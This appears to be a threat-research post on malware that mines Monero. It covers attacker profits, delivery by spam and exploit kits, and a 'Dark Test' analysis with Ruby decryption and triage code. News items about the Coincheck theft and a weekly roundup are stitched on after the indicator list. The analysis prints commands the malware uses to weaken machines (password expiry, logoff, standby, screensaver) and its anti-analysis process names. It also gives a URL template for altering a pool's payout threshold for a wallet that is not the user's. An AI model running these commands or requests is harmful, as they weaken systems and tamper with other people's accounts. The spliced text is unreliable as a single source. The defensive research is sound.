In analyzing the size and scope of this campaign, we observed that shortly after these attacks began the 'Worker ID' being used was generating over 500 KH/s. At the time of this writing, this particular attacker is still generating approximately 350 KH/s.
Current Hash Rate

We used an online calculator that takes hash rate, power consumption and cost and then estimates profitability. Given a hash rate of 350 KH/s, the estimated amount of Monero that would be mined per day was 2.24 XMR. This means that an attacker could generate approximately $704 USD per day, which equals $257,000 per year. This clearly indicates how lucrative this sort of operation could be for attackers.

Analyzing the statistical data and payment history information associated with this 'Worker ID' shows that a total of 654 XMR have been received. At the time of this writing, that would be worth approximately $207,884.
Worker ID Payment History

While analyzing the malware campaigns associated with the distribution of mining software, we identified dozens of high volume 'Worker IDs'. Taking a closer look at 5 of the largest operations we analyzed shows just how much money can be made by taking this approach.
High Volume Calculations

One additional benefit is that the value of the Monero mined has continued to rise over time. Much like Bitcoin, Monero valuation has exploded over the last year, from $13 in January 2017 to over $300 at the time of this article, and at times has approached $500. As long as the cryptocurrency craze continues and the value continues to increase, every piece of cryptocurrency mined increases in value, which in turn increases the amount of revenue generated. That covers some of the financial reasons adversaries leverage malicious mining, but how are these miners getting on to systems in the first place?

Threats Delivering Miners


Cryptocurrency miners are a new favorite of miscreants and are being delivered to end users in many different ways. The common ways we have seen miners delivered include spam campaigns, exploit kits, and directly via exploitation.

Email Based


There are ongoing spam campaigns that deliver a wide variety of payloads such as ransomware, banking trojans, miners, and much more. Below are examples of campaigns we've seen delivering miners. The way these infections typically work is that a user is sent an email with an attachment. These attachments typically contain an archive holding a Word document that downloads the miner via a malicious macro, or unpack a compressed executable that initiates the mining infection. In many of the campaigns Talos observed, the binary that is included is a widely distributed Monero miner which is executed with the miscreant's worker ID and pool, allowing attackers to reap the mining benefits.

Below is an example, from late 2017, of one of these campaigns. It's a job application spoof that includes a Word document purporting to be a resume of a potential candidate.
Example Malicious Email

As you can see, the email contains a Word document which, when opened, looks like the following.
Example Word Document

As is common for malicious Word documents, opening the document results in a file being downloaded. This is an example of a larger miner campaign dubbed 'bigmac' based on the naming conventions used.

This image entices the user to enable macro content within the document that is blocked by default. Once clicked, Word executes a series of highly obfuscated VBA macros using the Document_Open function:
Highly Obfuscated VBA Macros Using Document_Open()

The macro leads to a call to a Shell command:
Highly Obfuscated VBA Macro VBA.Shell Call

We can see what is executed by this command after it is de-obfuscated by passing the first parameter to a MsgBox call instead of Shell:
MsgBox for Shell Replacement

This will retrieve an executable remotely using System.Net.WebClient and execute it using Start-Process. This can also be seen through the dynamic activity in Threat Grid:
Office Document Launches a Powershell Indicator in Threat Grid

We also identify that the downloaded binary is attempting to masquerade itself through its use of an image extension:
Portable Executable Image Extension Identification Threat Grid

In this case the binary that is downloaded is a portable executable written in VB6 that executes a variant of the xmrig XMR CPU miner. This activity can be seen dynamically within Threat Grid:
xmrig Execution in Threat Grid

Dynamic miner activity can also be observed within the AMP for Endpoints product line. An example below can be seen within the portal's Device Trajectory:
Dynamic Miner Execution in AMP for Endpoint's Device Trajectory

Mining network traffic can also be classified using Cognitive Threat Analytics to identify miners within enterprise environments:
Mining Traffic Classification using Cognitive Threat Analytics

Dark Test Cryptomining Malware


Dark Test (the name taken from the decompiled source code) is an example of Cryptomining malware written in C# that drops a UPX packed variant of the xmrig XMR CPU miner. Being written in C#, the binary contains .NET IL (Intermediate Language) which can be decompiled back into source code. The C# code is highly obfuscated containing an encrypted resource section for all referenced strings, and functions that are resolved at runtime. The following section will discuss these techniques in detail.

Dark Test Obfuscation


Dark Test makes use of a packer which, after unpacking, creates a suspended copy of itself using CreateProcessA and overwrites it in memory with the unpacked version of the binary using WriteProcessMemory. The original binary can be recovered simply by setting a breakpoint on WriteProcessMemory within a debugger and dumping nSize bytes starting at the lpBuffer address.

Dark Test contains highly obfuscated C# code made up of a large amount of garbage instructions, arithmetic for branching to varying code sections, encrypted strings stored within its resource section, and functions that are resolved at runtime. Functions are resolved on load using arithmetic operations whose result is the metadataToken passed to Module.ResolveMethod, after which MethodHandle.GetFunctionPointer yields the address to call:
Dynamic Method Resolution Using metadataToken Integer

Functions are also called indirectly through the calli IL instruction, which takes a pointer to the function's entry point together with the call's arguments:
Runtime Resolved Function Calls using calli

The decryption function takes three integer parameters. The first two combine into the seek offset of the entry describing the string to be decrypted (its ciphertext offset and length), and the third is the XOR key for that string:
Dark Test String Decryption Function

At the calculated offset, the first four bytes are the offset of the ciphertext and the next four are the length of the string being decrypted. The function then loops over that many bytes, XORing each with the key, to decrypt the string at that offset. The integer parameters themselves are calculated at runtime, typically through a series of arithmetic operations and references to runtime objects:
Dark Test String Decryption Function Call

The result in this case is the string "-o pool.minexmr.com:4444 -u", the host and port of the mining pool the miner participates in followed by the username switch without its value. Although these strings are only decrypted at runtime, they are easily seen in the dynamic execution activity within Threat Grid (in this run another pool from the config was chosen):
Dynamic Miner Activity Command Line Arguments
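
The decryption routine described above, modelled in Ruby as an added example (this is not code from the Talos write-up or from the malware). The layout is taken from the description: an 8-byte entry holding a little-endian ciphertext offset and length, and a single-byte XOR key. How the first two integer parameters are combined into the entry offset is runtime arithmetic in the real binary; the example simply adds them, which is an assumption. The resource blob it decrypts is constructed by the script itself.

```ruby
# Model of the Dark Test string-decryption routine as described in the text.
# Added example, not code from the Talos write-up or from the malware.
# Assumed layout: at the entry offset sit a 4-byte little-endian ciphertext
# offset followed by a 4-byte little-endian length; the bytes at that offset
# are XORed with a single-byte key.

# Mirrors the decompiled decrypt(a, b, key). Combining a and b into the entry
# offset is runtime arithmetic in the real binary; a plain sum is an assumption.
def dark_test_decrypt(resource, param_a, param_b, key)
  entry = param_a + param_b
  if entry < 0 || entry + 8 > resource.bytesize
    raise ArgumentError, "entry offset #{entry} outside resource"
  end
  cipher_offset, length = resource.byteslice(entry, 8).unpack("VV")
  if cipher_offset + length > resource.bytesize
    raise ArgumentError, "ciphertext (#{cipher_offset}, #{length}) outside resource"
  end
  resource.byteslice(cipher_offset, length).bytes.map { |c| c ^ (key & 0xFF) }.pack("C*")
end

# Builds a synthetic resource section in that layout so the decryptor can be
# exercised offline: one 8-byte entry per string, then the XORed strings.
# Returns [blob, entries] where each entry is [entry_offset, key].
def build_resource(strings_and_keys)
  table = "".b
  data = "".b
  entries = []
  table_size = 8 * strings_and_keys.length
  strings_and_keys.each do |plain, key|
    entries << [table.bytesize, key]
    table << [table_size + data.bytesize, plain.bytesize].pack("VV")
    data << plain.bytes.map { |c| c ^ key }.pack("C*")
  end
  [table + data, entries]
end

if __FILE__ == $0
  # Plaintexts are strings recovered in the text; the keys are made up.
  blob, entries = build_resource([["-o pool.minexmr.com:4444 -u", 0x5A],
                                  ["/C net accounts /forcelogoff:no", 0xC3]])
  entries.each do |entry_offset, key|
    puts dark_test_decrypt(blob, entry_offset, 0, key)
  end
end
```

The range checks matter in practice: when the entry offset is derived from runtime arithmetic and the decompilation is imperfect, a wrong parameter value produces an out-of-range read rather than garbage, which makes mis-recovered parameters obvious.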

Runtime-resolved objects and functions make it difficult to extract all strings, as the decompilation is not always perfect, and not all strings are decoded during dynamic analysis because of different code branches (as seen in the example above). In the decompiled code, however, the num6 length calculation always contains the same three bytes (in decimal: 106, 242, 28) immediately after the one byte that varies per string. These bytes act as an egg: searching for them locates every runtime-calculated length, and the four bytes preceding the variable byte encode the ciphertext offset. With offset and length known, the XOR key can be brute forced by trying all 256 values and keeping those that yield only printable ASCII:
#!/usr/bin/ruby
# Scan a dumped Dark Test binary for the obfuscated length/offset "egg",
# recover (ciphertext offset, length) for each encrypted string and brute
# force the single-byte XOR key by requiring printable ASCII output.

fb = File.binread(ARGV[0]).bytes

# Through their obfuscation technique we get an egg for obfuscated string
# lengths and offsets to find in the resource: the constant bytes 106, 242, 28
# always follow the one variable byte of the 32-bit length operand.
EGG = [106, 242, 28].freeze
LENGTH_XOR = 485648943   # constant from the decompiled length arithmetic
OFFSET_XOR = 2100157544  # constant from the decompiled offset arithmetic

(5...(fb.length - 2)).each do |i|
  next unless fb[i, 3] == EGG

  # Perform their arithmetic: the variable byte plus the egg form a
  # little-endian 32-bit int, then (int - 5) ^ LENGTH_XOR gives the length
  length = (fb[i - 1, 4].pack("C*").unpack1("V") - 5) ^ LENGTH_XOR
  # The four bytes before the variable byte encode the ciphertext offset
  seek_offset_bytes = fb[i - 5, 4]
  seek_offset = (seek_offset_bytes.pack("C*").unpack1("V") ^ OFFSET_XOR) - 100
  puts "Found length of: #{length}"
  puts "Seek offset bytes: #{seek_offset_bytes.inspect}"

  # Skip trivial strings and entries whose computed offset is outside the file
  next if length <= 2 || seek_offset < 0 || seek_offset + length > fb.length
  ciphertext = fb[seek_offset, length]

  # Try every single-byte key; keep the ones yielding only printable ASCII
  (0x00..0xFF).each do |x|
    result = ciphertext.map { |c| x ^ c }
    next unless result.all? { |b| b.between?(0x20, 0x7E) }
    puts "Found possible XOR key 0x#{x.to_s(16)} for string: #{result.pack("C*")} of length: #{length}"
  end
end

This brute force approach produces some invalid results, but after manual review it also yields the clear-text strings, all of which are available in the appendix. Some interesting strings to highlight are those intended to keep the computer online so that mining continues:
/C net accounts /forcelogoff:no
This disables forced logoff when a user's logon hours expire, so a session is never terminated on a schedule.
/C net accounts /maxpwage:unlimited
This sets the maximum password age to unlimited, which in turn prevents password expiry.
/C powercfg /x /standby-timeout-ac 0
This sets the standby timeout on AC power to zero (never), so an idle machine does not enter standby and mining continues.
/C reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d 600000000 /f
This sets the screensaver timeout to roughly 19 years, effectively preventing the screensaver from ever starting.

Other observed strings are process names and messages used for anti-analysis checks:
procexp
PROCEXP
pROCESShACKER
ProcessHacker
procexp64
Detect detector!
Clear!
taskmgr

Dark Test Network traffic


Two GET requests are sent to api.ipfy.org to learn the public IP address. A GET request to qyvtls749tio[.]com follows, carrying HwProfileInfo.szHwProfileGuid as a machine identifier, a 64-bit flag, a video card parameter (always null), and the number of CPU cores. The server responds with youronionlink[.]onion URLs for two files, bz.exe and cpu.zip:
Dynamic Miner Activity Command Line Arguments

Oddly enough, this is not a valid .onion address. It is likely a placeholder returned by the server for this dropper, or the operator set this up without replacing what the gateway returns to the dropper on request. Searching for this pattern, we came across a pastebin containing a number of SQL commands, with Russian comments, for setting up a database holding these domains:
Pastebin SQL Commands

This further suggests that a builder or distributed gateway is in use. Further searches turned up a number of in-the-wild filenames that correspond to warez:
Dark Test VirusTotal Observed in-the-wild Filenames

This could indicate warez as being a possible distribution vector for this malware.

Dark Test Version 2


Throughout November we observed a sample with the same command and control parameters, mining pool, and persistence executable name as Dark Test. However, rather than dropping and executing a separate xmrig binary, it contained a statically linked copy. Because of these shared attributes we believe this is a new iteration of Dark Test, written in Visual C++ rather than C#. The binary ships inside an NSIS self-extracting installer, which launches unpacking code that writes into a newly spawned suspended process and then resumes its main thread. A notable difference is a more extensive list of anti-analysis process names, which are searched for by walking the process list with Process32FirstW:
Anti-Analysis Strings

An interesting addition is vnc.exe, possibly to detect VPS or analysis systems that are accessed over VNC.

Exploit Kit Based


In addition to the spam campaigns above, Talos has also observed the RIG exploit kit delivering miners via SmokeLoader over the last couple of months. The infection itself is standard for RIG activity. From an analyst's perspective, however, mining leaves easily trackable elements on the system, namely the 'Worker ID' (the wallet address passed to the miner), as shown below:
Command Line Syntax

Using the Worker ID of:
43Z8WW3Pt1fiBhxyizs3HxbGLovmqAx5Ref9HHMhsmXR2qGr6Py1oG2QAaMTrmqWQw85sd1oteaThcqreW4JucrLGAqiVQD
we began digging into the hash rate this worker was contributing. We found a worker fluctuating between 25 KH/s and 60 KH/s. Taking the average of 42.5 KH/s, this actor was earning about $85 per day.

That may not seem like a substantial amount of money, but consider that the miner could keep running for months, if not years, with no additional maintenance required by the actor. The only operational costs are renting the exploit kit and the associated infrastructure. Once victims are compromised, $85 a day keeps accruing, which is roughly $31,000 annually.

Looking further back, this campaign has been running on and off over the last six months, with peak hash rates in excess of 100 KH/s.
Historical Hash Rate

The campaign appeared to pick up steam beginning in September 2017, but we have evidence of the miners being deployed from as far back as June or July of 2017. Suddenly, mining activity completely stopped toward the end of October, and started back up again in mid December. It's currently still running as of the writing of this post. This shows the earning potential of using an exploit kit to deploy miners via a malware loader like smokeloader.

Active Exploitation


In addition to threats targeting users, Talos has also observed coin miners delivered via active exploitation against our honeypot infrastructure, using several different exploits. There have been widespread reports of EternalBlue being used to install miners, as well as various Apache Struts2 exploits and, most recently, an Oracle WebLogic exploit. This type of payload is well suited to active exploitation: it does not require persistent access to the end system, it is largely transparent to the end user, and it can result in significant financial gain.

When you take threats being delivered to users via email and web as well as internet connected systems being compromised to deliver a miner payload, it's obvious that miners are being pushed by adversaries today much like ransomware was being pushed to systems a year ago. Based on this evidence, we began digging a little bit deeper on the actual mining activity and the systems that have already been mining.

Deeper Dive on Mining and Workers


Over the course of several months, we began looking for crypto miner activity on systems and uncovered prevalent threats associated with multiple different groups relying on familiar tricks to run on systems. Additionally, we found a large number of enterprise users running or attempting to run miners on their systems for potential personal gain.

One thing common to most of the malicious miners we found was the choice of filename. Threat actors pick names that look harmless, such as "Windows 7.exe" and "Windows 10.exe". Talos also commonly saw "taskmgrss.exe", "AdobeUpdater64.exe", and "svchost.exe". Talos also found examples of miners being pulled down dynamically and run via the command line, an example of which is shown below.
Command Line Syntax

Interestingly, we also found miners purporting to be anti-virus software, including our own free anti-virus product Immunet.
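
The trackable elements discussed in the exploit kit section above (pool endpoint and Worker ID) and the lookalike filenames from this section, pulled out of process-creation records by a short Ruby triage script. This is an added example, not code from the Talos post or from any Cisco product. The events it runs over are constructed for the example, not captured data; the Worker ID is the one quoted in the text, and the pool argument patterns are those of an xmrig-style command line. The rule that svchost.exe is only legitimate under the Windows system directories is an assumption made for the example.

```ruby
# Added example: extract the trackable elements of a miner from process
# events and flag lookalike image names. Not code from the Talos post.

# Standard Monero address: 95 base58 characters starting with "4"
MONERO_ADDRESS = /\b4[1-9A-HJ-NP-Za-km-z]{94}\b/
# xmrig-style pool arguments: "-o host:port", "--url=host:port", stratum URLs
POOL_ARG = /(?:-o|--url)[ =](?:stratum\+tcp:\/\/)?([a-z0-9.\-]+:\d{2,5})/i
# Filenames the text reports as cover for miners; svchost.exe is assumed to be
# legitimate only when it runs from the Windows system directories
LOOKALIKE_NAMES = ["windows 7.exe", "windows 10.exe", "taskmgrss.exe",
                   "adobeupdater64.exe", "svchost.exe"].freeze
SYSTEM_DIR = /\A[a-z]:\\windows\\(?:system32|syswow64)\\/i

# Worker ID quoted in the text
SAMPLE_WORKER_ID = "43Z8WW3Pt1fiBhxyizs3HxbGLovmqAx5Ref9HHMhsmXR2qGr6Py1oG2QAaMTrmqWQw85sd1oteaThcqreW4JucrLGAqiVQD"

# Constructed process-creation events (image path and command line), not captured data
SAMPLE_EVENTS = [
  { image: "C:\\Users\\bob\\AppData\\Roaming\\taskmgrss.exe",
    cmdline: "taskmgrss.exe -o pool.minexmr.com:4444 -u #{SAMPLE_WORKER_ID} -p x --donate-level=1" },
  { image: "C:\\Windows\\System32\\svchost.exe",
    cmdline: "svchost.exe -k netsvcs" },
  { image: "C:\\Users\\bob\\Downloads\\Windows 10.exe",
    cmdline: "\"Windows 10.exe\" --url=stratum+tcp://xmr.pool.example:3333 --user=4AbcNotARealAddress" },
  { image: "C:\\Program Files\\Git\\bin\\git.exe",
    cmdline: "git.exe fetch origin" },
].freeze

# True when the image name is one of the lookalikes and is not svchost.exe
# running from a system directory
def lookalike?(image)
  name = File.basename(image.tr("\\", "/")).downcase
  return false unless LOOKALIKE_NAMES.include?(name)
  !(name == "svchost.exe" && image.match?(SYSTEM_DIR))
end

# Pull pool endpoint and wallet (Worker ID) out of one event's command line
def analyze(event)
  cmd = event[:cmdline]
  { image: event[:image],
    pool: cmd[POOL_ARG, 1],
    worker_id: cmd[MONERO_ADDRESS],
    lookalike: lookalike?(event[:image]) }
end

# Keep only events with a pool, a wallet, or a suspicious image name
def triage(events)
  events.map { |e| analyze(e) }.select { |r| r[:pool] || r[:worker_id] || r[:lookalike] }
end

if __FILE__ == $0
  triage(SAMPLE_EVENTS).each do |r|
    puts "#{r[:image]}: pool=#{r[:pool].inspect} worker=#{r[:worker_id].inspect} lookalike=#{r[:lookalike]}"
  end
end
```

The wallet address is the pivot worth keeping: it is the same value the pool's public statistics are keyed on, so one recovered Worker ID lets an analyst track the campaign's hash rate over time exactly as described in the exploit kit section.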

Mining as a Payload for the Future


Cryptocurrency miner payloads may be among the easiest money makers available to attackers. This is not to encourage them, of course, but the reality is that this approach is very effective at generating long-term passive revenue. Attackers simply have to infect as many systems as possible and execute the mining software in a manner that makes it difficult to detect, and they immediately begin generating revenue. Attackers are likely just as happy computing 10 KH/s as 500 KH/s; if they have a specific hash rate goal, they simply keep distributing miners to victims until they reach it.

The sheer volume of infected machines is how attackers measure success with these campaigns. Since financial gain via mining is the mission objective, there is no need to compromise hosts to steal documents, passwords, wallets, or private keys, as we have grown accustomed to seeing from financially motivated attackers. We have commonly seen ransomware delivered with additional payloads, which either provide a secondary financial benefit or, in some cases, deliver the real malicious payload; in the latter case the ransomware is used as a smokescreen designed to distract. While we have seen active vulnerability exploitation used as the initial vector for infecting systems with cryptocurrency mining software, that is the extent of the overtly malicious activity. Once a system has been infected in this scenario, attackers are typically focused on maximizing their hash rates and nothing more.

Leveraging the resources of a single infected system is unlikely to be profitable enough for most attackers. With 100,000 systems, however, the profitability of this approach skyrockets. In most cases attackers try to generate as much revenue as easily and cheaply as possible, and with mining software the control of victims' system resources, and the volume of hashes those resources can generate, is itself the revenue stream.

Recurring revenue is not just something a legitimate business strives for. Malicious adversaries do as well. Complex malware is expensive to design, create, test, and then deliver to victims. Complex malware is often reserved for very complex attacks and rarely is this type of malware used to attack 100,000s of users. As such a recurring revenue model isn't really applicable to these complex malware attacks, generally speaking. With cryptominers attackers have created an entire solution specifically designed to do one thing: generate recurring revenue.

The use of cryptominers as a payload, and the techniques for keeping an infected system running at full capacity, will continue to evolve. Talos has observed attacks where the attacker cleaned up the machine by removing other miners before installing their own mining software. Attackers are already fighting over these resources, because the potential monetary value and ongoing revenue stream are substantial.

Are Miners Malware?


Mining client software itself should not be considered malware or a Potentially Unwanted Application/Potentially Unwanted Program (PUA/PUP). Legitimate mining client software is simply being leveraged in a malicious way by actors to generate revenue by mining on infected machines. Mining software exists to keep a cryptocurrency running: it maintains consensus on the network, performs and validates transactions, and rewards miners for the computations that secure the integrity of the cryptocurrency ecosystem and network.

A legitimate user who runs the mining software locally can run their own mining operation, or join a pool to maximize their chances of receiving a payout. The difference between the legitimate user and a threat actor is that the legitimate user performs this task intentionally, on their own machine. The malicious actor performs exactly the same task, but on someone else's machine and without that user's knowledge or consent. The difference is the deception of the end user and the intent behind the mining. The software itself is unfortunately part of the arsenal the attacker chooses to use, but, much like PowerShell or PsExec when used in malicious attacks, it is not malicious by design; it is the intent with which it is used that matters. When these miners are leveraged by attackers, victims are unwittingly forced to pay for the electricity consumed during mining and have their computational resources abused to generate revenue for the actors.

Enterprise Impacts


Regardless of whether the miner was deployed using malicious methods or simply by an enterprise user trying to generate some coin from their work computer, enterprises have to decide if miners are malware within their environments.

This is an interesting challenge because generally the only thing miners do is consume CPU/GPU cycles solving complex math problems. For an organization, however, that is wasted or stolen resource, and depending on the configuration of the affected systems it could have larger impacts. Obviously, if a miner is placed onto a system via one of the methods discussed above, it is a malicious payload. However, Talos found large numbers of users who appeared to willingly run these miners on enterprise systems to generate coin.

Given the number of willing users, it may be worth an organization crafting a policy, or adding a section to an existing policy, on the use of miners on enterprise systems and how it will be handled. Additionally, it is up to each organization to decide whether these files should be treated as malware and removed or quarantined as such.

Fails we Found


While investigating malware campaigns that were distributing Monero mining software we observed an interesting case where the attacker used an open-source mining client called 'NiceHash Miner' and began distributing it. In this particular case, the command line syntax used to execute the miner on infected systems is below:
Command Line Syntax

Interestingly, the userpass parameter used to register the mining client to the specific Worker ID is '3DJhaQaKA6oyRaGyDZYdkZcise4b9DrCi2.Nsikak01'. When analyzing this campaign, we identified that this userpass is the default specified in the mining software's source code as released on GitHub. The attacker didn't bother to change it, so all of the infected machines were mining Monero that was being sent to the mining application's author, not to the attacker.
Source Code Default Values

In several other cases we observed attackers utilizing default values within the command line syntax being used to execute their miners. A few examples are below:
Mining Fail Example #1
Mining Fail Example #2
Mining Fail Example #3
Mining Fail Example #4

This clearly indicates that many of the attackers leveraging cryptocurrency miners are reusing code and command line syntax they find online, and in some cases may not actually understand the code they are working with or how cryptocurrency mining works. As a result, default values and placeholders are not always updated, and these attacks do not always monetize for the people running them.

Additionally, while performing our research we found an interesting way that could, in theory, allow one to manipulate the payouts received by the attackers. Currently, within the web interface used by many of the mining pools (and exposed via an API), there is a "Personal Threshold" value that is publicly editable. This setting determines how much coin must be mined before the payout will be sent to the attacker's wallet. By setting this value to a large amount (e.g. 50 XMR) the attacker would have to wait an extended period before receiving their next payout. While the attacker could just change this value back, it could be changed right back to 50 XMR using a GET request as long as the request is made to the mining pool's URL using the following structure:

"https://p5[.]minexmr[.]com/set_info?address=$WORKER&type=thold&amount=50000000000000"

Where $WORKER is the 'Worker ID' that is being modified. This same parameter is available on many of the major mining pool websites that we analyzed. Note that the syntax could be different depending on the pool that is being used by the adversary.

Conclusion


The number of ways adversaries are delivering miners to end users is staggering. It is reminiscent of the explosion of ransomware we saw several years ago. This is indicative of a major shift in the types of payloads adversaries are trying to deliver. It helps show that the effectiveness of ransomware as a payload is limited. It will always be effective to ransom specific organizations or to use in targeted attacks, but as a payload to compromise random victims its reach definitely has limits. At some point the pool of potential victims becomes too small to generate the revenue expected.

Crypto miners may well be the new payload of choice for adversaries. It has always been about money, and crypto mining is an effective way to generate revenue. It is not going to generate large sums from each individual system, but grouped across hundreds or thousands of systems it can be extremely profitable. It is also a more covert threat than ransomware: a user is far less likely to notice a malicious miner on the system beyond some occasional slowdown, which increases the time a system stays infected and generating revenue. In many ways it's the exact opposite of ransomware. Ransomware is designed to generate revenue from a victim within a couple of days, and the payoff is immediate. Malicious miners are designed to exist on a system for weeks, months, or ideally years.

It also introduces a new challenge to enterprises. A decision needs to be made on how to treat things like miners and whether they should be judged exclusively as malware. Each enterprise needs to decide how to handle these threats. The first step is determining how prevalent they are in your environment and then deciding how to handle it going forward.

Coverage


There are different ways to address miners, and Cisco security products have detection built in for this activity. There is a specific detection name in AMP for coin miners, W32.BitCoinMiner; however, as miners can be added as modules to various other threats, the detection names may vary. Additionally, there are NGIPS signatures designed to detect mining activity. These rules may not be enabled by default in your environment, depending on how potentially unwanted applications (PUA) are prioritized on your network. The signatures that detect this type of activity include, but are not limited to: 40841-40842, 45417, and 45548-45550.

Also, technologies like Threat Grid have created indicators to clearly identify when mining activity is present when a sample is submitted.

IOC Section


IP Addresses:


89.248.169[.]136
128.199.86[.]57

Domains:


qyvtls749tio[.]com
youronionlink[.]onion

File Hashes


Coincheck hackers are reportedly trying to unload stolen cryptocurrency

Last week, hackers stole around $534 million worth of cryptocurrency XEM from Tokyo-based exchange Coincheck, and now, Reuters reports, the hackers behind the heist are trying to sell the stolen cryptocurrency. Jeff McDonald, vice president of the NEM Foundation, the company behind XEM, told Reuters that he had tracked down an account holding the coins and those in possession of the stolen XEM were trying to sell them on six different cryptocurrency exchanges. "He is trying to spend them on multiple exchanges. We are contacting those exchanges," said McDonald. He also told Reuters that he couldn't yet determine how much of the stolen coins had already been spent.

Via: Reuters

Coincheck Hack Ghosts $534 Million Worth of Cryptocurrency

Following the recent hack of Japanese exchange service Coincheck, $534 million worth of cryptocurrency was stolen from the company’s “hot wallet”. With the investigation revealing that hackers remained undetected for an estimated eight hours on Jan. 25, the Japanese Financial Services Agency (FSA) warned the exchange service to set up improvements that prevent or limit such incidents.

Although Japan has asked all cryptocurrency operators to register with the government in an attempt to regulate the industry, Coincheck was allowed to continue operating. Because it had applied for a license as an exchange, Coincheck does fall under the supervision of the FSA.

The company said it’s currently tracking the missing funds and may be able to recover them. However, there is no guarantee that the process will be successful.

“We know where the funds were sent,” said Co-founder Yusuke Otsuka in a press conference. “We are tracing them and if we’re able to continue tracking, it may be possible to recover them. But it is something we are investigating at the moment.”

While the equivalent of 58 billion yen in NEM tokens was stolen, Coincheck said it will cover 90 percent of losses using internal funds.

“What’s the lasting impact? It’s hard to tell,” said Marc Ostwald, global strategist at ADM Investor Services International in London. “Japan is one of the most pro-crypto trading countries, among the G-20. In Japan they don’t really want a wholesale clampdown. So it will be interesting how Japanese regulators respond to this, if they indeed do.”

Coincheck is not the first cryptocurrency exchange to fall victim to a cryptocurrency heist; in 2014 Mt. Gox lost between $400 million and $480 million. Japanese regulators have since started to regulate cryptocurrency exchanges to prevent similar losses.

Cybersecurity week Round-Up (2018, Week 4)

Let's try to summarize the most important events that occurred last week in 3 minutes.

The threats that most of all characterized this week are IoT botnets and malvertising.

Security experts at NewSky Security believe the operators of the recently discovered Satori botnet are launching a new massive hacking campaign against routers to infect them and recruit them into a botnet dubbed Masuta. The Masuta botnet targets routers using default credentials; one of the versions analyzed, dubbed “PureMasuta”, relies on the old D-Link network administration exploit (EDB 38722).

A new botnet called Hide ‘N Seek (HNS botnet) appeared in the threat landscape; the malware is rapidly spreading, infecting unsecured IoT devices, mainly IP cameras. The number of infected systems grew from 12 at the time of discovery to over 20,000 bots.

Malware experts at CSE Cybsec uncovered a massive malvertising campaign dubbed EvilTraffic leveraging tens of thousands of compromised websites. Crooks exploited CMS vulnerabilities to upload and execute arbitrary PHP pages used to generate revenue via advertising.

The problems with the Meltdown and Spectre security patches continue: Intel recommended that customers stop deploying the current versions of the Spectre/Meltdown patches, while Linux creator Linus Torvalds called the Spectre updates “utter garbage.”

Bell Canada suffered a data breach for the second time in less than a year.

Crooks continue to focus on cryptocurrencies: researchers at Palo Alto Networks uncovered a Monero mining operation that impacted 30 million users worldwide.

Maersk's chairman revealed that the company reinstalled 45,000 PCs and 4,000 servers after the NotPetya attack.

The week ended with a major incident: the Japan-based digital exchange Coincheck was hacked, with attackers stealing NEM worth roughly half a billion US dollars. The incident had a significant effect on the value of the most popular cryptocurrencies.

Pierluigi Paganini

(Security Affairs – cybersecurity, cyberweek)

The post Cybersecurity week Round-Up (2018, Week 4) appeared first on Security Affairs.

Japan cryptocurrency exchange to refund stolen assets worth $400m

Coincheck, one of Japan’s major cryptocurrency exchanges, has promised to refund its customers about $423m (£282m) stolen by hackers two days ago in one of the biggest thefts of digital funds.

The hack occurred on Friday, when the company detected “unauthorised access” to the exchange and suspended trading for all cryptocurrencies apart from bitcoin.

The attackers were able to access the company’s NEM coins. NEM is a lesser known cryptocurrency but still the world’s 10th biggest by market capitalisation. The losses amounted to about $534m (£380m).

The company has stated that it will reimburse affected customers nearly 90% of their loss in cash.

Over 260,000 customers are reported to have been affected by the hack.

According to Coincheck, the hackers were able to steal the NEM coins because they were kept in online “hot wallets” instead of the more secure and offline “cold wallets.”

The company claims that it is aware of the digital address where the coins have been transferred and believes the assets are recoverable.

E Hacking News - Latest Hacker News and IT Security News

Japan-based digital exchange Coincheck to refund to customers after cyberheist

Coincheck announced it will refund about $400 million to 260,000 customers after the hack; the company will use its own funds.

On Friday, news of the hack of the Japan-based digital exchange Coincheck caused a drop in the value of the major cryptocurrencies. The incident had a significant impact on the value of NEM, which dropped more than 16 percent in 24 hours.

The company suspended deposits and withdrawals for all virtual currencies except Bitcoin, and announced it was investigating “unauthorised access” to the exchange.

According to the company, the hackers stole NEM worth roughly half a billion US dollars; NEM is the 10th biggest cryptocurrency by market capitalization.

The hackers stole 58 billion yen ($530 million), an amount greater than the value of the bitcoins that disappeared from Mt. Gox in 2014.

Coincheck was founded in 2012 and is one of the most important cryptocurrency exchanges in Asia.

The company announced it will refund about $400 million to customers after the hack.

Coincheck will use its own funds to reimburse about 46.3 billion yen to the 260,000 customers impacted by the cyberheist.

“At 3 am (1800 GMT) today, 523 million NEMs were sent from the NEM address of Coincheck. It’s worth 58 billion yen based on the calculation at the rate when detected,” said Coincheck COO Yusuke Otsuka.

“We’re still examining how many of our customers are affected.”

Experts believe that the Financial Services Agency will take disciplinary measures against Coincheck.

It has been estimated that as many as 10,000 businesses in Japan accept bitcoin, and according to the exchange bitFlyer nearly one-third of global Bitcoin transactions in December were denominated in yen. Cryptocurrencies, and Bitcoin in particular, are very popular in Japan; in April, Bitcoin was recognised by the local authorities as a legal method of payment.

According to the Japanese bitcoin monitoring site Jpbitcoin.com, yen-denominated bitcoin trades reached a record 4.51 million bitcoins in November, nearly half of the 9.29 million bitcoins traded on the world’s major exchanges.

Japanese media criticized the company, blaming management for underestimating the importance of securing investors' assets; they said Coincheck “expanded business by putting safety second”.

Politicians and experts who participated in the World Economic Forum in Davos issued warnings about the dangers of cryptocurrencies, and governments are expected to adopt further measures to prevent abuse and illegal uses of cryptocurrencies.

 

Pierluigi Paganini

(Security Affairs – Coincheck, Security Breach)

The post Japan-based digital exchange Coincheck to refund to customers after cyberheist appeared first on Security Affairs.


Coincheck loses $400 million in massive cryptocurrency heist

Tokyo-based cryptocurrency exchange Coincheck just made history, and not in a good way. It has lost around $534 million worth of NEM tokens, one of the lesser-known cryptocurrencies, after its network was hacked on January 25th, 12:57pm EST. The attackers remained undetected for eight hours, giving them enough time to steal 523 million tokens kept in a "hot wallet," a type of storage that's connected to the internet for easy spending. While the exact value of the stolen coins is unclear due to the ever-changing nature of cryptocurrency (it's $400 million at the very least), Coincheck might have already lost more than what Mt. Gox did a few years ago.

Source: CoinDesk, BBC, Bloomberg

Trend Micro spotted a malvertising campaign abusing Google’s DoubleClick to deliver Coinhive Miner

Trend Micro uncovered a spike in the number of web miners over the past few days, including Coinhive, apparently linked to Google’s DoubleClick ads displayed on YouTube and other sites.

